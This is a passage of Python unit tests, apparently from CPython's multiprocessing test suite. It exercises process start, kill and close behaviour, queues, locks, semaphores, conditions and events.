self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
